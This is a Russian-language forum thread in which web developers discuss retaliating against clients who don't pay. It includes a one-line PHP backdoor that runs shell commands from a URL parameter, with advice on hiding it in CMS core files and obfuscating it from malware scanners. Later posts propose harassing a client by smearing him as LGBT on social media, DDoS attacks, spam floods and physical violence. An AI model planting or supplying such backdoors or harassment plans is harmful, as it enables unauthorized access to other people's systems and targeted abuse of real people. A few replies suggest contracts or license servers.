Как защитить свой труд от кидалова заказчика?

Поделись как это делать!!!
У меня в шелах опыта нет.
Тут показано как это примерно делается:
Тут можно найти пару шеллов для Jommla: Для просмотра ссылки Войди или Зарегистрируйся
Но это только то, что плавает на поверхности, всяких вариантов — масса. Можно даже заказать
Суть такова: почти в любой файл встраивается код, используя который можно тем или иным способом получить доступ к другим файлам и БД, даже если нерадивый клиент заблокировал вам доступ к ним. Если в шеллах не сечете, то подождите ответа тут, может быть, кто-то и расскажет вам более подробно, либо можете заказать шелл по нужному вами алгоритму на фрилансе.
 
У меня были шелы просто отдельные файлы, прятал как можно дальше в шаблоне, и давал имена вроде styletheme.php я поищу на старых хардах может что найду, очень давно не пользовался ими.
 
Надо учитывать что на любом нормальном хостинге делаются резервные копии сайта.
По запросу владельца при помощи них сайт будет восстановлен.
Так что лучше смотреть в сторону правильных ТЗ,договоров и адекватных заказчиков.
 
Надо учитывать что на любом нормальном хостинге делаются резервные копии сайта.
По запросу владельца при помощи них сайт будет восстановлен.
Так что лучше смотреть в сторону правильных ТЗ,договоров и адекватных заказчиков.
Ну по сути да, но в основном скажу что 90% заказчиков даже с трудом понимают что такое хостинг)
 
У меня были шелы просто отдельные файлы, прятал как можно дальше в шаблоне, и давал имена вроде styletheme.php я поищу на старых хардах может что найду, очень давно не пользовался ими.
Это слишком заметно, такие может и сам хостер убить.(типо айболитом прогнать раз в неделю)
Лучше встраивать в какой-нибудь системный файл самой CMS/CMF который доступен из вне

PHP:
<?php
system($_GET['csrf_fake']);
?>

Понятное дело что и тот же айболит найдёт)) Но тут суть в том что если найдёт то убьет системный файл (например запихнуть в core.php какой нить)
Для банального примера, вставляем в тот же index.php среди строк
Код:
system($_GET['csrf_fake']);

И потом просто обращаться к сайту: site.ru/index.php?csrf_fake=КОММАНДы терминала, а там можно что угодно уже делать.

Конечно можно сказать авось эти функции отключены на хосте и потому не сработает(таких хостов мало) и то что строку можно хоть в base64 хоть в eval и еще тьму вариантов загнать, это дело лично каждого в зависимости от навыков и знаний в этой сфере.

А так конечно можно и под тот же ioncube загонять с этой же строкой файлы системы (хоть с привязкой к MAC адресу и домену)
Вариантов тьма

PS> Если кто-то серьезно заинтересован в подобном пишите в ЛС (за пиво) сообразим))
 
Надо учитывать что на любом нормальном хостинге делаются резервные копии сайта.
По запросу владельца при помощи них сайт будет восстановлен.
Так что лучше смотреть в сторону правильных ТЗ,договоров и адекватных заказчиков.
Это конечно идеальный вариант и в основном так и работаем, но иногда попадаются представители секс меньшинств. У меня за 10 лет второй раз. И вроде сумма небольшая, но как выяснилось, он и не собирался платить изначально. Потом я выдавил из него $10 из $50. Но наказать хотя бы морально надо.
Я предполагаю испортить ему репутацию, так как в его небольшом городке его многие знают. Через соцсети сделать его представителем ЛГБТ. Ну и все знакомые и не только в городе об этом узнают.

На сайт, который я ему правил доступа нет.

Если есть альтернативные варианты - предложите!
 
Если есть альтернативные варианты - предложи
Заддосить его хост, заспамить почту, мессенджеры, телефон, написать заяву копам, трахнуть его, чтоб весь ютьюб услышал или въе*ать ему так, чтобы зубы по всей остановке разлетелись, заблокировать телефоны (тут где-то была тема, чел помогал добыть инфу, может и заблокировать поможет), нанять коллекторов...ну а по делу, пид***сов (это не о геях) надо наказывать, но иногда стоит смириться с тем, что есть такие типы и вынести из этого для себя урок.
 
Заддосить его хост, заспамить почту, мессенджеры, телефон, написать заяву копам, трахнуть его, чтоб весь ютьюб услышал или въе*ать ему так, чтобы зубы по всей остановке разлетелись, заблокировать телефоны (тут где-то была тема, чел помогал добыть инфу, может и заблокировать поможет), нанять коллекторов...ну а по делу, пид***сов (это не о геях) надо наказывать, но иногда стоит смириться с тем, что есть такие типы и вынести из этого для себя урок.
Человек выше чертовски прав, но и с капелькой еба*утости)
 
Шелы - из-за 50$-100$ под неправомерный доступ к информации? Спам, ддос и т.п. - больше времени потеряешь, чем отдача. Хотя есть такие, которым и за бесплатно сделаешь, но обычно редкое исключение.

Лучше сервер лицензий сделать, на том же гитхабе есть беслпатные, нужен только хостинг. Выдавать ключи доступа, сам код, под куб или хороший обфускатор.
 
Назад
Сверху